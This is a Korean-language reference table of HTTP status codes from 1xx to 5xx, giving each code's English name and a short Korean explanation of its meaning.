1xx	정보제공
100	Continue	요청이 초기 검증을 통과했으며, 계속 진행해도 됩니다.
101	Switching Protocol	서버 프로토콜 변경 요청을 승인했습니다.
103	Early Hints	캐시 사전 로딩 정보를 제공합니다.
2xx	성공
200	OK	요청이 성공적으로 처리되었습니다.
201	Created	요청으로 인해 새로운 리소스가 생성되었습니다.
202	Accepted	요청이 수락되었지만, 아직 처리되지 않았습니다.
204	No Content	요청은 성공했지만, 응답 본문이 없습니다.
206	Partial Content	부분 콘텐츠 요청이 성공적으로 처리되었습니다.
3xx	리다이렉션
301	Moved Permanently	리소스가 영구적으로 새로운 URL로 이동했습니다.
302	Found	리소스가 임시적으로 다른 URL에서 제공합니다.
303	See Other	리소스를 다른 URL로 조회해야 합니다.
304	Not Modified	클라이언트의 캐시된 리소스가 여전히 유효합니다.
307	Temporary Redirect	임시적으로 다른 URl로 리다이렉션됩니다.
308	Permanent Redirect	영구적으로 다른 URL로 리다이렉션됩니다.
4xx	클라이언트 오류
400	Bad Request	잘못된 요청 형식으로 인해 서버가 요청을 이해하지 못했습니다.
401	Unauthorized	인증이 필요합니다.
403	Forbidden	요청은 이해되었지만, 권한이 없어 거부되었습니다.
404	Not Found	요청한 리소스를 찾을 수 없습니다.
405	Method Not Allowed	요청 메서드가 허용되지 않습니다.
408	Request Timeout	서버가 요청을 기다리다 시간 초과되었습니다.
5xx	서버 오류
500	Internal Server Error	서버에서 알 수 없는 오류가 발생했습니다.
501	Not Implemented	서버가 요청된 기능을 지원하지 않습니다.
502	Bad Gateway	서버가 잘못된 게이트웨이 응답을 받았습니다.
503	Service Unavailable	서버가 과부하 상태이거나 유지보수 중입니다.
504	Gateway Timeout	게이트웨이 또는 프록시 서버가 응답 시간 초과되었습니다.
505	HTTP Version Not Supported	서버가 요청된 HTTP 버전을 지원하지 않습니다.